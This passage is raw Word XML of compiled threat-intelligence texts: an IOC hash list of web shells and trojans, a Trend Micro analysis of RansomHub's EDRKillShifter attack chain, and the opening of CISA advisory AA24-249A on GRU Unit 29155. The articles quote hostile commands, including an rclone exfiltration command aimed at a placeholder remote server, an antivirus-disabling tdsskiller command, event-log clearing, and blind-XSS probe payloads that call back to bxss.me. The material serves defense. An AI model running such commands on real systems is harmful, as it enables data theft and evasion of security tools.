        <w:t>a24303234e0cc6f403fca8943e7170c90b69976015b6a84d64a9667810023ed7 Trojan.Win64.STEALHOOK.A passwin.dll 6e4f237ef084e400b43bc18860d9c781c851012652b558f57527cf61bee1e1ef Trojan.PS1.DULLDROP.I624 temp.ps1 b3257f0c0ef298363f89c7a61ab27a706e9e308c22f1820dc4f02dfa0f68d897 Trojan.Win64.DULLOAD.I t.exe abfc8e9b4b02e196af83608d5aaef1771354b32c898852dff532bd8cfd2ce59d Backdoor.ASP.DULLWSHELL.I624 Defaults.aspx 43c83976d9b6d19c63aef8715f7929557e93102ff0271b3539ccf2ef485a01a7 N/A u.ps1 ca98a24507d62afdb65e7ad7205dfe8cd9ef7d837126a3dfc95a74af873b1dc5 Backdoor.ASP.DULLWSHELL.I624 Defaults.aspx 7ebbeb2a25da1b09a98e1a373c78486ed2c5a7f2a16eec63e576c99efe0c7a49 N/A Microsoft.Exchange.WebServices.dll c0189edde8fa030ff4a70492ced24e325847b04dba33821cf637219d0ddff3c9 Backdoor.ASP.DULLWSHELL.I624 Logout.aspx 6d8bdd3e087b266d493074569a85e1173246d1d71ee88eca94266b5802e28112 HackTool.Win64.CVE202430088.I p.enc 27a0e31ae16cbc6129b4321d25515b9435c35cc2fa1fc748c6f109275bee3d6c Contains the task of ""MicrosoftEdgeUpdateTaskMachineUAE"" that t.exe source e.xml 54e8fbae0aa7a279aaedb6d8eec0f95971397fea7fcee6c143772c8ee6e6b498 Trojan.Win64.DULLOAD.I r.exe 1169d8fe861054d99b10f7a3c87e3bbbd941e585ce932e9e543a2efd701deac2 HackTool.PS1.DullScan.I p.ps1 af979580849cc4619b815551842f3265b06497972c61369798135145b82f3cd8 Trojan.PS1.DULLDROP.I j.ps1 1d2ff65ac590c8d0dec581f6b6efbf411a2ce5927419da31d50156d8f1e3a4ff Backdoor.ASP.DULLWSHELL.I624 Defaults.aspx abfc8e9b4b02e196af83608d5aaef1771354b32c898852dff532bd8cfd2ce59d Backdoor.ASP.DULLWSHELL.I624 s.inc 98fb12a9625d600535df342551d30b27ed216fed14d9c6f63e8bf677cb730301 Renamed Ngrok n.exe edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef PSEXEC PsExec64.exe ca98a24507d62afdb65e7ad7205dfe8cd9ef7d837126a3dfc95a74af873b1dc5 Backdoor.ASP.DULLWSHELL.I624 Globals.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2024.10.11 12:08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks-uae-gulf-regions.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>How Ransomhub Ransomware Uses EDRKillShifter to Disable EDR and Antivirus Protections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 Micro tracked this group as Water Bakunawa, behind the RansomHub ransomware, employs various anti-EDR techniques to play a high-stakes game of hide and seek with security solutions.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Kyle Philippe Yu, Christian Alpuerto, John Paul Lim, Charles Adrian Marty, Mohammed Malubay, Mark Chester De Quiroz September 20, 2024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Subscribe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Highlights: The group, Trend Micro tracked this group as Water Bakunawa, behind the RansomHub ransomware employs various anti-EDR techniques to play a high- stakes game of hide and seek with security solutions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The RansomHub ransomware's attack chain includes exploiting the Zerologon vulnerability (CVE-2020-1472). Left unpatched, it can enable threat actors to take control of an entire network without needing authentication. RansomHub has been attributed to ransomware attacks on the following industries and critical infrastructure sectors: water and wastewater, IT, commercial and government services and facilities, healthcare, agriculture, financial services, manufacturing, transportation, and communications. Trend Micro analysts and experts found corroborating evidence of multiple spear-phishing attempts, indicating that the ransomware attacks are targeted. They have been known to threaten organizations they've successfully targeted, demanding ransom payments in exchange for not releasing the compromised files to the public.</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RansomHub is notable for its affiliate model and for using techniques to disable or terminate endpoint detection and response (EDR) to evade detection and prolong its presence within compromised systems or networks. Due to the recent discovery of our threat hunting team regarding Ransomhub's new evasion technique: the integration of the EDRKillShifter within its attack chain. We were able to investigate a recent incident from Trend Micro's Vision One telemetry data.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EDRKillShifter is designed to exploit vulnerable drivers, undermining the effectiveness of EDR solutions by employing techniques to evade detection and disrupt security monitoring processes. In addition, EDRKillShifter enhances persistence mechanisms by employing techniques that ensure its continuous presence within the system, even after initial compromises are discovered and cleaned. It dynamically disrupts security processes in real- time and adapts its methods as detection capabilities evolve, staying a step ahead of traditional EDR tools. Seamlessly integrated into the entire attack chain, EDRKillShifter ensures that all phases of an attack benefit from its EDR-disabling functionalities, increasing overall effectiveness. These advancements make EDRKillShifter a formidable tool against conventional endpoint security solutions, necessitating the adoption of more robust and adaptive security measures by organizations.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Over the past months, the cybercriminals behind the RansomHub ransomware have gained significant notoriety. The FBI's advisory in August reported that it has successfully targeted 210 organizations across a range of industries and critical infrastructure sectors, including IT, government services, healthcare, agriculture, financial services, transportation, and communications.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this article, we take a closer look into how RansomHub uses EDRKillShifter in its attack chain and how it disrupts traditional defense mechanisms. Insights into these techniques can help cybersecurity professionals anticipate RansomHub's strategies and other threats that might employ similar TTPs.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advanced features of Trend Micro's Vision One have been instrumental in uncovering these tactics. Vision One's comprehensive telemetry and advanced analytical capabilities have allowed us to dissect and understand the sophisticated methods employed by RansomHub. With Vision One's insights, we have been able to map out its tactics, techniques, and procedures (TTPs) as well as its operational methods and impact on cybersecurity defenses.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RansomHub's infection chain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 The infection chain of the RansomHub utilizing EDRKillShifter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 illustrates the infection chain of the RansomHub ransomware, detailing the stages from initial access to data exfiltration and ransom demand.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Initial access: RansomHub typically achieves initial access by targeting internet-facing systems and user endpoints through methods such as phishing emails, exploitation of known vulnerabilities, and password-spraying attacks. In a particular incident that we analyzed, we found that a single compromised user account was primarily responsible for most malicious activities, indicating that it was the principal entry point for the attack. This is corroborated by evidence of multiple spear phishing attempts that we identified during our analysis. With telemetry data from Vision One, we also identified another potential access vector: the Zerologon vulnerability (CVE-2020-1472), which has also been observed in an unrelated incident.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2. Multiple detections indicating a possible spear phishing attack</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3. Detections via Vision One and indicating abuse of elevation control mechanism</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Evasion: In this specific incident, we have identified that RansomHub employed four batch script files as a means of evasion. The batch script files observed were named "232.bat", "tdsskiller.bat", "killdeff.bat", and "LogDel.bat":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232.bat employs a brute-force attack technique known as password spraying and disables Windows Defender's real-time monitoring feature.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4. 232.bat performing brute force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5. 232.bat disabling Windows Defender's real-time monitoring feature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tdsskiller.bat batch script's function is to modify the Windows Registry to set the default shell program to explorer.exe for users logging into the system. It also forcibly terminates a set of processes based on their image names utilizing a combination of filters and wildcards.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6. Modification of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon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7. Utilization of the taskkill utility to terminate running processes in Windows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also uses "C:\Windows\tdsskiller.exe" to disable an antivirus service using the command "-dcsvc "TMBMServer" -accepteula". The parameter -dcsvc "TMBMServer" specifically targets the TMBMServer service, which is a Trend Micro service known as Trend Micro Unauthorized Change Prevention Service, instructing the TDSSKiller utility to disable it. The addition of - accepteula indicates that the end-user license agreement (EULA) was automatically accepted, allowing the command to execute without additional prompts. This action deactivates the designated antivirus service, which compromises the system's security.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8. Vision One detection of tdsskiller disabling an antivirus service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Meanwhile, killdeff.bat has an obfuscated command, which is an obfuscated PowerShell script designed to toggle Windows Defender settings for malicious purposes. It includes various stages of execution that manipulate registry entries, alter Windows Defender and notification settings, and attempt privilege escalation. The script employs sophisticated techniques such as obfuscated inline expressions, environment-variable readings, and conditional logic to enable or disable Windows Defender's features and suppress notifications. Additionally, it includes user interaction prompts to decide on enabling or disabling Windows Defender. It abuses low-level interactions with system processes to elevate privileges to bypass UAC.</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9. killdeff.bat's obfuscated PowerShell command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 observed LogDel.bat making suspicious changes to system files and settings. The script specifically altered the attributes of the Default.rdp file by executing the command, "attrib Default.rdp -s -h", removing the system and hidden attributes to make the file more accessible for potential tampering. Additionally, LogDel.bat was found to have the capability to modify the Windows registry key at HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers, potentially altering Remote Desktop Protocol (RDP) settings to facilitate unauthorized remote access.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10. The command used to remove system and hidden attributes of Default.rdp via Attrib.exe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Of further concern is the script's capability to clear Windows Event Logs using wevtutil, thereby erasing tracks of any malicious activities and hindering forensic investigations.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11. LogDel.bat executing wevtutil.exe to execute the command "wevtutil.exe cl "Application""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EDRKillShifter: In this part, we will dive into the analysis of EDRKILLShifter from our threat hunting team. The EDRKillShifter tool functions as a "loader" executable, serving as a delivery mechanism for a legitimate driver that is susceptible to abuse to terminate applications related to antivirus solutions. This type of tool is often referred to as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"bring your own vulnerable driver" (BYOVD) tool. The execution process of this loader involves three primary steps. Initially, the attacker must run EDRKillShifter using a command line that includes a password string.</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12. Execution of EDRKillShifter with the "-pass" argument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When executed with the correct password, the executable decrypts an embedded resource named "data.bin" and executes it in memory. The data.bin code unpacks and executes the final payload. This payload then deploys and exploits the vulnerable legitimate drivers to acquire sufficient privileges to disengage an EDR tool's protection.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13. data.bin file created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Once the contents of data.bin has been decrypted, it will proceed in executing the code. The second-stage payload will then decrypt the final payload which contains the Gobinary and the vulnerable driver.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14. EDRKillShifter dropping the vulnerable driver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list of applications that EDRKillShifter can terminate can be found in the IoC text file linked at the end of the article.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15. EDRKillShifter (svc.exe) creates a Windows service named KB20240815</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Credential access: Ransomhub escalates its attack by employing Task Manager to dump credentials from the Local Security Authority Subsystem Service (LSASS) memory. This technique allows the ransomware to extract sensitive credentials, opening the door to deeper and more damaging breaches. By gaining access to these critical credentials, Ransomhub can amplify its highly intrusive attacks and complicate recovery efforts.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16. Taskmgr.exe creating a file named lsass.DMP</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Discovery: Ransomhub ramps up its attack by deploying the NetScan tool for covert network reconnaissance. Using the lateral tool transfer technique (T1570), they sneak NetScan into the victim's system via the RDP buffer. This tactic allows RansomHub to map out the victim's network, laying the groundwork for targeted attacks and even more severe breaches.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17. Execution of Netscan.exe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Lateral movement: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employing the Lateral Tool Transfer technique, the attackers stealthily moved malicious tools between systems. They then used SMB/Windows Admin Shares to remotely connect and execute commands. Central to their strategy was the use of the NetScan tool to pinpoint and map network endpoints, allowing for precise and efficient lateral movements throughout the network.</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18. RansomHub utilizing NetScan for discovery and employing the Lateral Tool Transfer technique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Command and control: RansomHub utilized the remote access tool AnyDesk as their command-and-control (C&amp;C) infrastructure. AnyDesk, typically used for legitimate remote support and connectivity, was repurposed by the attackers to maintain control over compromised systems. Through AnyDesk, they executed commands, exfiltrated sensitive data, and orchestrated lateral movements across the network.</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19. RansomHub installing AnyDesk.exe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Exfiltration: The threat actors employ the command-line tool "rclone" to steal sensitive files from the compromised network. This tactic aligns with MITRE ATT&amp;CK technique T1041, Exfiltration Over C2 Channel, where data is transferred out of the network to a remote location under the attackers' control.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Let's take this command as an illustration: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rclone copy \\&lt;COMPROMISED_IP&gt;\i$ &lt;REMOTE_SERVER&gt;:&lt;REMOTE_PATH&gt;\Users -- include ".pdf" --include ".docx" --include ".sql" --max-age &lt;DATE&gt;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&lt;COMPROMISED_IP&gt; represents the IP address of the targeted system, while &lt;REMOTE_SERVER&gt;:&lt;REMOTE_PATH&gt; refers to the location where the exfiltrated data is sent, and &lt;DATE&gt; specifies a cutoff date for file modification. This command selectively targets valuable file types, such as documents and databases, and transfers them to a remote server. The attackers use these exfiltrated files as leverage, threatening their owners to release them publicly if the ransom is not paid.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Impact: After executing RansomHub's TTPs, the ransomware binary is subsequently deployed. To successfully execute the ransomware binary with EDRKillShifter , a predefined password key must be provided using the parameter "-pass".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20. RansomHub binary with the -pass argument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Upon successful execution, RansomHub proceeds to encrypt files, appending an extension that depends on the file name of the ransom note. In this incident, the ransom note has a file name of "README_1d7fdb.txt".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21. Ransom note example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 Figure 21 shows, the encrypted file has a file extension of ".1d7fdb," whose name, as mentioned, depends on the ransom notes' file name. This indicates the successful encryption of the file.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22. File encrypted by RansomHub</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Additionally, the RansomHub binary has the capability to delete all existing Volume Shadow Copy Service (VSS) snapshots on a Windows system via vssadmin.exe without prompting for any confirmation.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23. Deletion of Shadow Copies via vssadmin.exe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RansomHub's attack chain highlights a growing trend in ransomware operations, where attackers increasingly rely on advanced tools like EDRKillShifter to bypass security defenses. This underscores the need for a multilayered defense strategy that combines forward-looking technology with proactive threat intelligence. As ransomware groups </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>adopt similar anti-EDR tactics, enhancing resilience and adapting security strategies will be crucial to safeguarding digital assets. Security recommendations for RansomHub</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 defend against the evolving threat of RansomHub, organizations should adopt a comprehensive security strategy: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Strengthen endpoint protection systems. Ensure that your EDR solutions are equipped with the latest threat intelligence to detect new and evolving ransomware techniques. Behavioral analysis and heuristic scanning help detect unusual activity or anomalous behaviors that may signal attempts to execute ransomware. Restrict access to endpoints based on continuous verification to limit lateral movement. Endpoint isolation and rollback capabilities can also help mitigate potential attacks.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 Micro's Apex One, for example, provides multilayered protection with advanced threat detection and response capabilities, using behavioral analysis and machine learning to detect and mitigate threats. Trend Micro's XDR provides comprehensive threat visibility and expert analytics across email, endpoints, servers, cloud workloads, and networks.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Implement driver- and kernel-level protections. These security mechanisms help prevent unauthorized access and manipulation of system drivers, a tactic employed by RansomHub. There are also tools and technologies that can safeguard against the execution of malicious or unsigned drivers. Ensure that only trusted code runs within the kernel space, and regularly monitor kernel-level activities to detect suspicious behavior and see if security tools themselves are protected from tampering.</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 Micro's Deep Security has an integrity-monitoring feature that ensures that only signed and verified drivers are allowed, preventing unauthorized or malicious drivers from being loaded. Deep Security also has a virtual patching capability that provides immediate protection against newly discovered vulnerabilities in drivers before official patches are applied.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Enforce credential and authentication security. Enable multifactor authentication (MFA) across all access points, regularly update passwords, and monitor for any signs of credential misuse. Limit access based on roles to reduce exposure and ensure that authentication systems are regularly audited for vulnerabilities to prevent unauthorized access.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Trend Micro Password Manager for instance, enforces the use of strong, complex passwords and regular password rotations across all systems to reduce the risk of unauthorized access to systems requiring elevated privileges.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Enable behavioral monitoring and anomaly detection. These security mechanisms continuously analyze patterns of normal behavior to flag deviations that could indicate ransomware or other malicious activities. Detecting anomalies early, such as unauthorized file encryption or lateral movement within the network, allows for a swift response before major damage occurs. Combining real-time monitoring with automated alerts and analysis significantly enhances your ability to detect threats like RansomHub in their early stages.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Apex One, for example, has behavior monitoring capabilities to detect and block malicious activities such as unauthorized file modifications or memory allocation anomalies. Trend Micro's Managed XDR services augments threat and anomaly detection with expert analysis and 24/7 monitoring across email, endpoints, servers, cloud workloads, and networks.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Harden the endpoints' security configurations. Apply strict access controls, disable unnecessary services, and ensure that all systems are regularly patched and updated. Standardize security settings across devices and regularly audit endpoint configurations to identify and address weaknesses or vulnerabilities before they can be exploited.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Deep Security has an application control feature that allows only verified and authorized applications while blocking unauthorized executables. The Trend Micro Apex Central solution enforces the principle of least privilege by ensuring that applications and users have only the permissions necessary for their respective functions.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 Micro Vision One Threat Intelligence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 stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.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 Micro Vision One Intelligence Reports App [IOC Sweeping]</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RansomHub Attacks Surge: New Anti-EDR Tactics Unveiled and AMADEY Infrastracture Connection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 Micro Vision One Threat Insights App</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Threat Actor/s: Water Bakunawa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Emerging Threats: RansomHub Ramps Up: New Anti-EDR Tactics Unveiled and AMADEY Infrastructure Connection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Hunting Queries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 Micro Vision One Search App</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 Micro Vision Once Customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.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EDRKILLSHIFT Detection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malName:("*EDRKILLSHIFT*") AND eventName:MALWARE_DETECTION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hunting queries are available for Vision One customers with Threat Insights Entitlement enabled. Indicators of Compromise (IoCs):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The full list of IOCs can be found here.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MITRE ATT&amp;CK(R) techniques Tactic</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Technique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Initial Access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Valid Accounts: Domain Accounts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T1078.002</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Exploitation of Remote Services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T1210</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Execution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Service Execution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T1569.002</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Privilege Escalation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Abuse Elevation Control Mechanism: Bypass User Account Control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T1548.002 Defense Evasion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Impair Defenses: Disable or Modify Tools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T1562.001</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File and Directory Permissions Modification: Windows File and Directory Permissions Modification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T1222.001</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Indicator Removal: Clear Windows Event Logs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T1070.001</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Impair Defenses: Safe Mode Boot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T1562.009 Credential Access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Brute Force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T1110</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OS Credential Dumping</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T1003</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OS Credential Dumping: LSASS Memory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T1003.001 Exfiltration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Exfiltration to Cloud Storage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T1567.002 Discovery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Network Service Discovery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T1046 Lateral Movement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Remote Services: SMB/Windows Admin Shares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T1021.002 Impact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Data Encrypted for Impact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T1486</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Inhibit System Recovery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T1490 Credential Access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Brute Force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T1110</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OS Credential Dumping</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T1003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2024.09.20 18:08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Russian Military Cyber Actors Target US and Global Critical Infrastructure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Release Date September 05, 2024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Alert Code AA24-249A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Summary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The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>early as January 13, 2022. These cyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit 74455.</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 mitigate this malicious cyber activity, organizations should take the following actions today: Prioritize routine system updates and remediate known exploited vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment networks to prevent the spread of malicious activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enable phishing-resistant multifactor authentication (MFA) for all externally facing account services, especially for webmail, virtual private networks (VPNs), and accounts that access critical systems.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Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors-both during and succeeding their deployment of WhisperGate against Ukraine-as well as further analysis (see Appendix A) of the WhisperGate malware initially published in the joint advisory, Destructive Malware Targeting Organizations in Ukraine, published February 26, 2022.</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FBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020: U.S. Department of the Treasury U.S. Department of State (Rewards for Justice) U.S. Cyber Command Cyber National Mission Force (CNMF) Netherlands Defence Intelligence and Security Service (MIVD) Czech Military Intelligence (VZ) Czech Republic Security Information Service (BIS) German Federal Office for the Protection of the Constitution (BfV) Estonian Internal Security Service (KAPO) Latvian State Security Service (VDD) Security Service of Ukraine (SBU) Computer Emergency Response Team of Ukraine (CERT-UA) Canadian Security Intelligence Service (CSIS) Communications Security Establishment Canada (CSE) Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) United Kingdom National Cyber Security Centre (NCSC-UK)</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additional information on Russian state-sponsored malicious cyber activity and related indictments, see the recent U.S. Department of Justice (DOJ) press releases for June 26, 2024, and September 5, 2024, FBI's Cyber Crime webpage, and CISA's Russia Cyber Threat Overview and Advisories webpage.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Download the PDF version of this report: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AA24-249A Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure (PDF, 1.01 MB )</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a downloadable copy of indicators of compromise (IOCs):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AA24-249A STIX XML (XML, 321.47 KB )</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AA24-249A STIX JSON (JSON, 201.39 KB ) Technical Details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Note: This advisory uses the MITRE ATT&amp;CK(R) Matrix for Enterprise framework, version 15. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actors' activity mapped to MITRE ATT&amp;CK tactics and techniques. GRU Unit 29155: Cyber Component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FBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage and influence operations, and assassination attempts throughout Europe. Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020. Unit 29155 cyber actors' objectives appear to include the collection of information for espionage purposes, reputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the destruction of data [T1485].</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FBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit 29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors, including known cyber-criminals and enablers to conduct their operations. Cybersecurity Industry Tracking</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cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to Unit 29155 cyber actors. While not all encompassing, the following are the most notable threat group names related under MITRE ATT&amp;CK G1003 and commonly used within the cybersecurity community.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cadet Blizzard (formerly known as DEV-0586 by Microsoft)[1],[2] Ember Bear (also known as Bleeding Bear by CrowdStrike)[3] Frozenvista UNC2589[4] UAC-0056[5]</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Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. Government's understanding for all activity related to these groupings. Victimization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addition to WhisperGate and other incidents against Ukraine, Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization (NATO) in Europe and North America, as well as countries in Europe, Latin America, and Central Asia. The activity includes cyber campaigns such as website defacements, infrastructure scanning, data exfiltration, and data leak operations. These actors sell or publicly release exfiltrated victim data obtained from their compromises. Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine.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 date, the FBI has observed more than 14,000 instances of domain scanning across at least 26 NATO members and several additional European Union (EU) countries. Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim information.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Whether through offensive operations or scanning activity, Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, Central American, and Asian countries. TTP Overview Reconnaissance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Unit 29155 cyber actors have been observed targeting IP ranges [T1595.001] used within multiple government and critical infrastructure organizations. The following are publicly available tools these cyber actors have used for scanning [T1595] and vulnerability exploit efforts. Unit 29155 cyber actors were not observed using these tools outside of their intended purpose. Note: Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use and/or control.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Acunetix: Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and vulnerabilities for networks [T1595.002].[6] Amass: Unit 29155 cyber actors leveraged both Amass and VirusTotal to obtain subdomains for target websites [T1590.002].[7] Droopescan[8] JoomScan[9] MASSCAN: Unit 29155 cyber actors used MASSCAN and Nmap to discover other machines once inside victim networks.[10] Netcat[11] Nmap: Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the Nmap Scripting Engine [NSE]) to write custom scripts for discovering and scanning other machines [T1046]. Shodan: Unit 29155 cyber actors used Shodan to identify hosts with a specific set of vulnerabilities or device types [T1596.005].[12] VirusTotal[13] WPScan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Additionally, Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration [T1572] over port 1194, and in some instances, to perform Active Directory (AD) enumeration. Adminer in combination with Impacket and ldapdomaindump were tools used for gathering information on AD. Once active devices are found, Unit 29155 cyber actors look for vulnerabilities to exploit. For example, the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind cross-site scripting, as shown in the following commands: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GET /index.php?log=to@example.com&gt;%0d%0abcc:009247.3183- 377.3183.1bf6c.19446.2@bxss.me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"GET /CMS/files/log.htm HTTP/1.1" * * "(nslookup hitccruvbrumn76c1b.bxss.me||perl -e \"gethostbyname('hitccruvbrumn76c1b.bxss.me')\")"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 the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines, they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure [T1588.005]. Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the following CVEs: CVE-2020-1472 (Microsoft: Windows Server) CVE-2021-26084 (Atlassian Confluence Server and Data Center) CVE-2021-3156 (Red Hat: Privilege Escalation via Command Line Argument Parsing) CVE-2021-4034 (Red Hat: Polkit Privilege Escalation) CVE-2022-27666 (Red Hat: Heap Buffer Overflow Flaw)</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Analysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access [T1190], as detailed throughout this advisory: CVE-2021-33044 (Dahua Security) CVE-2021-33045 (Dahua Security) CVE-2022-26134 (Atlassian Confluence Server and Data Center) CVE-2022-26138 (Atlassian Confluence Server and Data Center) CVE-2022-3236 (Sophos: Firewall) Resource Development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Rather than build custom solutions, Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations. As a result, many TTPs overlap with those of other cyber actors, which can lead to 